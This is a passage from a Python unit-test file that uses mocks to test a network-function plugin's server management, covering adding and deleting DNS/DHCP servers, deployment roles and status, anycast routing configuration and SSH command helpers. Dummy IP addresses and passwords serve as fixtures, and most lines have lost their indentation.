delete_server = False
mock_delete_entity.return_value = delete_server
mem_nfv = mock.Mock()
mock_memcache_nfv.return_value = mem_nfv
mock_g.user.logger.error.side_effect = Exception("exception")
exception = mock.Mock()
jsonify = {"status": "Failed",
"message": "Scale in failed", "error": str(exception)}
mock_jsonify.return_value = jsonify
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import scale_in # pylint:disable=import-error
        with self.assertRaises(Exception):
            scale_in(data)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password.decrypt_password')
def test_stop_anycast_services_true(self, mock_decrypt_password, mock_run_ssh_command, mock_g):
# pylint: disable=missing-docstring
mock_decrypt_password.return_value = "d8e8fca"
mock_run_ssh_command.return_value = b'retcode=ok', None
server_id = 334498
username = "root"
pwd = "d8e8fca"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import stop_anycast_service # pylint:disable=import-error
stop_anycast_service(server_id, username, pwd)
mock_g.user.logger.debug.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password.decrypt_password')
def test_stop_anycast_services_false(self, mock_decrypt_password, mock_run_ssh_command, mock_g):
# pylint: disable=missing-docstring
mock_decrypt_password.return_value = "d8e8fca"
mock_run_ssh_command.return_value = b'retcode=nhii', b'error'
server_id = 334498
username = "root"
pwd = "d8e8fca"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import stop_anycast_service # pylint:disable=import-error
stop_anycast_service(server_id, username, pwd)
self.assertEqual(mock_g.user.logger.error.call_count, 2)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_by_name(self, mock_g):
# pylint: disable=missing-docstring
server = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
config_id = 102728
server_name = "bdds169"
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_by_name # pylint:disable=import-error
actual = get_server_by_name(config_id, server_name)
expected = server
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getEntityByName.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.BAMException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_by_name_with_exception(self, mock_g):
# pylint: disable=missing-docstring
config_id = 102728
server_name = "bdds169"
mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_by_name # pylint:disable=import-error
with self.assertRaises(Exception):
get_server_by_name(config_id, server_name)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_roles')
def test_delete_server_roles_with_delete_entity_true(self, mock_get_server_roles, mock_delete_entity):
# pylint: disable=missing-docstring
roles = [335958, 335957]
mock_get_server_roles.return_value = roles
server_id = "334498"
mock_delete_entity.return_value = True
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_server_roles # pylint:disable=import-error
actual = delete_server_roles(server_id)
expected = True
self.assertEqual(expected, actual)
mock_get_server_roles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.delete_entity')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.get_server_roles')
def test_delete_server_roles_with_delete_entity_false(self, mock_get_server_roles, mock_delete_entity):
# pylint: disable=missing-docstring
roles = [335958, 335957]
mock_get_server_roles.return_value = roles
server_id = "334498"
mock_delete_entity.return_value = False
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_server_roles # pylint:disable=import-error
actual = delete_server_roles(server_id)
expected = False
self.assertEqual(expected, actual)
mock_get_server_roles.assert_called_once_with(server_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_roles(self, mock_g):
# pylint: disable=missing-docstring
server_id = "334498"
roles = [
{
"id": 335958,
"entityId": 160080,
"serverInterfaceId": 332455,
"type": "NONE",
"service": "DHCP",
"properties": "readOnly=false|secondaryServerInterfaceId=334499|"
},
{
"id": 335957,
"entityId": 160080,
"serverInterfaceId": 332455,
"type": "NONE",
"service": "DHCP",
"properties": "readOnly=false|secondaryServerInterfaceId=334499|"
}]
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.return_value = roles
roles_id = [335958, 335957]
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_roles # pylint:disable=import-error
actual = get_server_roles(server_id)
expected = roles_id
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_server_roles_none(self, mock_g):
# pylint: disable=missing-docstring
server_id = "334498"
mock_g.user.logger.warning.side_effect = Exception("exception")
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.side_effect = Exception(
"exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_server_roles # pylint:disable=import-error
        with self.assertRaises(Exception) as context:
            get_server_roles(server_id)
        self.assertTrue("exception" in str(context.exception))
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentRoles.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_delete_entity_true(self, mock_g):
# pylint: disable=missing-docstring
entity_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_entity # pylint:disable=import-error
actual = delete_entity(entity_id)
expected = True
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.delete.assert_called_once_with(
entity_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_delete_entity_false(self, mock_g):
# pylint: disable=missing-docstring
entity_id = "334498"
mock_g.user.get_api.return_value._api_client.service.delete.side_effect = Exception("exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import delete_entity # pylint:disable=import-error
        with self.assertRaises(Exception) as context:
            delete_entity(entity_id)
        self.assertTrue('exception' in str(context.exception))
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.paramiko')
def test_is_check_available_server_with_true(self, mock_paramiko, mock_process_password):
# pylint: disable=missing-docstring
ssh = mock.Mock()
mock_paramiko.SSHClient.return_value = ssh
pwd_decrypt = "d8e8fca"
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
mock_process_password.decrypt_password.return_value = pwd_decrypt
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import is_check_available_server # pylint:disable=import-error
actual = is_check_available_server(server_ip, username, password)
expected = True
self.assertEqual(actual, expected)
mock_process_password.decrypt_password.assert_called_once_with(
password)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.NoValidConnectionsError', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.paramiko')
def test_is_check_available_server_with_false(self, mock_paramiko, mock_process_password):
# pylint: disable=missing-docstring
ssh = mock.Mock()
mock_paramiko.SSHClient.return_value = ssh
pwd_decrypt = None
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
mock_process_password.decrypt_password.return_value = pwd_decrypt
ssh.connect.side_effect = OSError('exception'), Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import is_check_available_server # pylint:disable=import-error
actual = is_check_available_server(server_ip, username, password)
expect = False
self.assertEqual(actual, expect)
mock_process_password.decrypt_password.assert_called_once_with(
password)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.return_value = server_id
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
actual = add_server(server_ip, server_name,
config_id, profile, properties)
expected = server_id
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server_with_portal_exception(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.side_effect = Exception(
"exception")
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
        with self.assertRaises(Exception):
            add_server(server_ip, server_name,
                       config_id, profile, properties)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.time')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_add_server_with_webdefault_exception(self, mock_g, mock_time):
# pylint: disable=missing-docstring
properties = "password=bluecat|connected=true|upgrade=False"
server_id = "3334498"
server_name = "bdds_169"
server_ip = "192.168.88.169"
config_id = "102728"
profile = 'DNS_DHCP_SERVER_60'
mock_g.user.get_api.return_value._api_client.service.addServer.side_effect = Exception(
"exception")
start = 15
mock_time.time.return_value = start
mock_g.user.get_api.return_value.get_entity_by_id.return_value.get_id.return_value = server_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import add_server # pylint:disable=import-error
        with self.assertRaises(Exception) as context:
            add_server(server_ip, server_name,
                       config_id, profile, properties)
        self.assertTrue('exception' in str(context.exception))
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_false(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value.get_entity_by_id.side_effect = Exception(
"exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.logger.warning.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
        with self.assertRaises(Exception):
            create_deployment_roles(
                server_name, server_id, config_id, view_name, role_type, properties)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_server_id_none(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = None
server_obj = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
        server_nsf = {
            "id": 111
        }
        # First lookup returns the server object, the second returns the NSF entity
        mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = [
            server_obj, server_nsf]
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
role_id = None
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = role_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_successfully(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = 334498
server_nsf = {
"id": 111
}
mock_g.user.get_api.return_value._api_client.service.getEntityByName.return_value = server_nsf
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
role_id = 111
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = role_id
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = role_id
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_none_server_id(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
server_id = None
server_obj = {
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}
        server_nsf = {
            "id": 111
        }
        # First lookup returns the server object, the second returns the NSF entity
        mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = [
            server_obj, server_nsf]
server_name = "bdds169"
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.return_value = None
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
actual = create_deployment_roles(
server_name, server_id, config_id, view_name, role_type, properties)
expected = False
self.assertEqual(expected, actual)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_webfault_exception(self, mock_g):
# pylint: disable=missing-docstring
configuration = mock.Mock()
mock_g.user.get_api.return_value.get_entity_by_id.return_value = configuration
mock_g.user.get_api.return_value._api_client.service.getEntityByName.side_effect = Exception(
"exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
mock_g.user.get_api.return_value._api_client.service.addDNSDeploymentRole.side_effect = Exception(
"exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
        with self.assertRaises(Exception):
            create_deployment_roles(
                server_name, server_id, config_id, view_name, role_type, properties)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.PortalException', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_create_deployment_roles_with_portal_exception(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value.get_entity_by_id.side_effect = Exception(
"exception")
mock_g.user.logger.warning.side_effect = Exception("exception")
server_name = "bdds169"
server_id = 334498
config_id = 102728
view_name = "default"
role_type = "SLAVE_STEALTH"
properties = ""
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import create_deployment_roles # pylint:disable=import-error
        with self.assertRaises(Exception):
            create_deployment_roles(
                server_name, server_id, config_id, view_name, role_type, properties)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_get_list_servers(self, mock_g):
# pylint: disable=missing-docstring
list_server = [{
"id": 334498,
"name": "bdds169",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}, {
"id": 332454,
"name": "bdds141",
"type": "Server",
"properties": "defaultInterfaceAddress=192.168.88.169|servicesIPv4Address=192.168.89.169|servicesIPv6Address=FDAC:1400:1::20|fullHostName=bdds169|profile=DNS_DHCP_INTEGRITY_BRANCH|"
}]
configuration_id = 102728
mock_g.user.get_api.return_value._api_client.service.getEntities.return_value = list_server
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_list_servers # pylint:disable=import-error
actual = get_list_servers(configuration_id)
expected = list_server
self.assertEqual(expected, actual)
mock_g.user.get_api.return_value._api_client.service.getEntities.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_get_memcached_config(self, mock_read_config_json_file):
# pylint: disable=missing-docstring
data_config = {
"sync_interval": 1,
"memcached_host": "192.168.88.170",
"memcached_port": 11211,
"k1_api": {
"address": "192.168.88.161",
"port": 5555,
"uri": "/api/v1.0/srvo/instances/realtime_load"
}
}
mock_read_config_json_file.return_value = data_config
memcached_host = "192.168.88.170"
memcached_port = 11211
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_memcached_config # pylint:disable=import-error
actual = get_memcached_config()
expected = memcached_host, int(memcached_port)
self.assertEqual(expected, actual)
mock_read_config_json_file.assert_called_once()
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.read_config_json_file')
def test_get_memcached_config_with_exception(self, mock_read_config_json_file):
# pylint: disable=missing-docstring
data_config = {}
mock_read_config_json_file.return_value = data_config
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import get_memcached_config # pylint:disable=import-error
with self.assertRaises(Exception):
get_memcached_config()
mock_read_config_json_file.assert_called_once()
def test_deploy_server_config_true(self):
# pylint: disable=missing-docstring
server_id = 334498
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import deploy_server_config # pylint:disable=import-error
actual = deploy_server_config(server_id)
expect = True
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_deploy_server_config_false(self, mock_g):
# pylint: disable=missing-docstring
server_id = 334498
mock_g.user.get_api.return_value._api_client.service.deployServerConfig.side_effect = Exception(
"exception")
mock_g.user.logger.error.side_effect = Exception("exception")
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import deploy_server_config # pylint:disable=import-error
with self.assertRaises(Exception):
    deploy_server_config(server_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_fail_with_web_fault(self, mock_g):
# pylint: disable=missing-docstring
status = None
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
with self.assertRaises(Exception):
    wait_for_deployment(server_id)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_successfully(self, mock_g):
# pylint: disable=missing-docstring
status = 2
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = status
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_with_big_count(self, mock_g):
"""
:param mock_g:
:return:
"""
status = 9
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.return_value = status
server_id = "334498"
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = status
self.assertEqual(actual, expect)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.WebFault', Exception)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.g')
def test_wait_for_deployment_fail_with_status_not_in_list(self, mock_g):
# pylint: disable=missing-docstring
mock_g.user.get_api.return_value._api_client.service.getServerDeploymentStatus.side_effect = Exception(
"exception")
server_id = "334498"
result = False
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import wait_for_deployment # pylint:disable=import-error
actual = wait_for_deployment(server_id)
expect = result
self.assertEqual(actual, expect)
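Taken together, the four `wait_for_deployment` tests suggest a polling loop: return the status when polling succeeds, and return `False` when the API call faults. A hedged sketch of that shape (the terminal status values, the retry budget, and the injected `get_status` callable are assumptions, not taken from the plugin source):

```python
# Hedged sketch of the polling behaviour the tests above exercise.
TERMINAL_STATUSES = {2, -1}  # assumed values, e.g. deployed / failed

def wait_for_deployment_sketch(get_status, server_id, max_polls=10):
    status = None
    try:
        for _ in range(max_polls):
            status = get_status(server_id)
            if status in TERMINAL_STATUSES:
                return status
        return status  # retry budget exhausted: report the last status seen
    except Exception:  # a WebFault from the API maps to a False result
        return False
```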
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_ospfd_and_ipv6(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "ospfd",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"ospf_authenticate": "nhii",
"ospf_dead_interval": "",
"ospf_hello_interval": "",
"ospf_password": "",
"ospf_area": "nhii",
"ospf_stub": "123",
"ospfv3_hello_interval": "",
"ospfv3_dead_interval": "",
"ospfv3_area": "",
"ospfv3_range": ""
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_ospfd_and_ipv4(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = None
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "ospfd",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"ospf_authenticate": "nhii",
"ospf_dead_interval": "",
"ospf_hello_interval": "",
"ospf_password": "",
"ospf_area": "nhii",
"ospf_stub": "123",
"ospfv3_hello_interval": "",
"ospfv3_dead_interval": "",
"ospfv3_area": "",
"ospfv3_range": ""
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_bgp(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "bgp",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"prefix_lists": None,
"bgp_local_asn": "nhii",
"bgp_telnet_password": "",
"bgp_keepalive_time": "",
"bgp_command_line_interface": "",
"bgp_hold_time": "",
"bgp_ipv6_address": "",
"bgp_ipv4_address": "",
"bgp_remote_asn_in_ipv4": "",
"bgp_ipv4_hop_limit": "",
"bgp_next_hop_self_ipv4": "",
"bgp_md5_ipv4": "",
"bgp_remote_asn_in_ipv6": "",
"bgp_ipv6_hop_limit": "",
"bgp_next_hop_self_ipv6": "",
"bgp_md5_ipv6": "",
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.set')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.re')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_psmclient_cmd')
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.process_password')
def test_configure_anycast_with_protocol_rip(self, mock_process_password, mock_run_psmclient_cmd,
mock_re, mock_set, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
mock_process_password.decrypt_password = mock.Mock()
server_ip = "192.168.88.169"
username = "root"
server_ipv6 = "FDAC:1400:1::20"
pwd = "d8e8fca"
anycast_config = {
"anycast_protocol": "rip",
"anycast_ipv4": "192.18.88.169",
"anycast_ipv6": "FDAC:1400:1::20",
"prefix_lists": None,
"rip_authenticate": "nhii",
"rip_password": "",
}
m = mock.Mock() # pylint:disable=invalid-name
mock_re.match.return_value = m
psm_overrides = {'anycast', 'nhiii'}
mock_set.return_value = psm_overrides
output, error = "nhiii", "info"
mock_run_ssh_cmd.return_value = output, error
from GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management import configure_anycast # pylint:disable=import-error
configure_anycast(server_ip, server_ipv6,
username, pwd, anycast_config)
@mock.patch('GatewayNFVPlugin.gateway_nfv_plugin.gateway_nfv_management.run_ssh_cmd')
def test_run_psmclient_cmd_with_output_ok(self, mock_run_ssh_cmd):
# pylint: disable=missing-docstring
output, error = b'retcode=ok', b''
mock_run_ssh_cmd.return_value = output, error
server_ip = "192.168.88.169"
username = "root"
password = "d8e8fca"
cmd = ""
